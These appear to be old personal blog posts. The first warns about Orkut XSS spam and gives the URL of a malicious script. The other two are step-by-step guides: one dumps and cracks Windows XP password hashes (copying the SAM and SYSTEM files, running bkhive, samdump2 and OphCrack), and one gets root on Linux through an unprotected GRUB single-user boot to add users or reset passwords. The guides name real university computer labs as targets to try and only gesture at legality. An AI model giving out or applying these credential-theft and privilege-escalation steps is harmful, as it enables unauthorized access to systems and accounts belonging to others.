Orkut: Beware of Spammers and Click safely

Orkut, google's answer to Myspace and Facebook in the social networking arena, has recently got me really really frustrated. Orkut is a popular social network among Brazilians and Indians, who account for more than 80% of the site's traffic.
Coming from a company like google, one would expect high standards of security and privacy controls, but the recent exploits are sadly discouraging.

Orkut is overflowing with spam and XSS attacks. They seem like friendly scraps, which ask you to click on some links or paste some code on your browser address bar to see something cool. This runs a java script which gets access to your contacts and private data, and then rest is to left to the attackers creativity. One recent spam I received was like this

Now if you receive this from a really good friend, you would be excited to know, which girl he is referring to. So I clicked to see her profile. On her profile, she mentions of this mystery friend of hers and asks you to copy and run a code, to see his (her friend's) profile.

If you smart, you would have guessed, it's just another xss atack. If you are smarter, you would paste this on your address bar and look for the location of the javascript. This is what I found: http://coolpics99.110mb.com/gudfoto5.js

Open this javascript from a text editor, and you would figure out what this script really does..

For interested folks, this scraps all your friends with the exact message that you received. Sometimes it amuses me how people have so much spare time, to do such creative stuff.. and people like me have to write about them. But in retrospect, it's dangerous and I hope google does something to fix this. There can be far reaching implications like identity and credit card thefts. My suggestion to people, view the source/link of anything that you click on or you might regret that click, all your life. Play Safe and Click safe :)

Here is an interesting community that teaches and practices such exploits and bugs on orkut.. Bugs on Orkut

Hacking/Recovering windows XP passwords

Please note, this article is for educational purpose only.

Goal: To recover windows xp account passwords when you obviously don't have an admin privilege.

Prereq: 1. You either have access to booting via CD (in many places CD boots are disabled in bios)
2. Any other OS - XP or Linux is also installed to which you have access to.

Tools needed: OphCrak Live CD, rainbow tables

Lets start.

How does it work?

Generally XP account passwords are stored as hashes in the encrypted SAM file, located in c:\windows\system32\config\SAM
The process requires you to get a hashdump of this SAM file and pass it to OphCrack, which will then use this beautiful method involving rainbow tables to recover the password for you. Rainbow tables are way faster than the usual dictionary and brute force method.

1. If bios allows you to boot via a CD, you are in luck. Burn the OphCrak Live CD and it will take care of the rest. Simply specify which XP instance you want to recover the password.
It will automatically get a hash dump and start the recovery password.

2. Alternate way, the one I describe here in detail is using your other OS. Say, you already have Linux as the second OS. Get an access to it either using your legitimate account or using the "Hacking Linux root accounts via grub" article.

a) Download OphCrack from the website.

b) Download a rainbow table depending on your ram.

c) Copy SAM and SYSTEM file from the following location (assuming you know how to mount ntfs partitions)

cp /mnt/win_C/WINDOWS/SYSTEM32/Config/SAM ./

cp /mnt/win_C/WINDOWS/SYSTEM32/Config/SYSTEM ./

where /mnt/win_c is where your windows NTFS partition is mounted and the current folder is OphCrack/linux tools/ folder

d) Run the Bkhive and samdump2 tools

bkhive SYSTEM temp.txt

samdump2 SAM temp.txt > hashes.txt

both these are available in your OphCrack/linux tools folder

e) Run OphCrack. Load the rainbow table and the hashes.txt file and wait.
The process timing depends on the strength of the stored password.

Great! You have recovered your account password.
Note: You can selectively extract only "your" account password, if you do have any ;)
Now login using the username/password recovered and check.

Places to experiment: SOC 1 lvl 8 PC labs (NUS)

Caution: It is a criminal offense if you don't have the right to access the system. Also, accounts authenticated using LDAP cannot be recovered this way. There is generally a debugger account which will give you some admin rights to add remove users for the pc.

Hacking Linux root accounts via grub

This is a very common and popular way to reset root password if grub is not password protected by the system administrator.

Places you can try: SOC level 8 PC labs. They recently installed fc6 but forgot to protect grub ;)

Note: With great power comes great responsibilities. Use the root account with caution.

1. Switch on the pc and press a key to bypass the default OS boot.
2. Grub menu will show up.
3. Highlight the entry that displays the selected linux distro and type e
4. This takes you to the edit mode. Highlight the second entry (leave the rescue entry) and add single at the end to the boot entry

5. Once you have done that. Enter b
6. Your installed linux distro will reboot and take you to the init 1 or single or admin mode.

7. To add a new user, type
adduser guest

where guest is the name of new user you want to add.

8. To reset your or anyother users passwd
passwd <user>

The above mentioned way is a great way to reset your password in case you forgot it, or get access to a linux pc if grub is not protected.